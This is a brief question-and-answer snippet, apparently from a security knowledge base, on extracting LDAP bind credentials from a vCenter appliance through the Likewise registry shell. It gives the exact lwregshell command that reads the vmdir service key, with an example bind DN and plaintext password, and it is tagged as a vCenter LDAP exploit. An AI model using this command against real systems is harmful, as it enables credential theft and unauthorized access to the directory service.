How do you export LDAP credential information from a vCenter appliance using the Likewise shell?
Run the command `/opt/likewise/bin/lwregshell list_values '[HKEY_THIS_MACHINE\services\vmdir]'` to export the LDAP credential information. This provides the necessary bind DN and password (e.g., `cn=192.168.1.1,ou=Domain Controllers,dc=aaa,dc=bbb` with password `P@ssWord123@@`) needed to connect to the LDAP database. A detailed walkthrough is available in vSphere Development Guide 5 - LDAP.
likewise shellLDAP credentialsvCenter LDAP exploit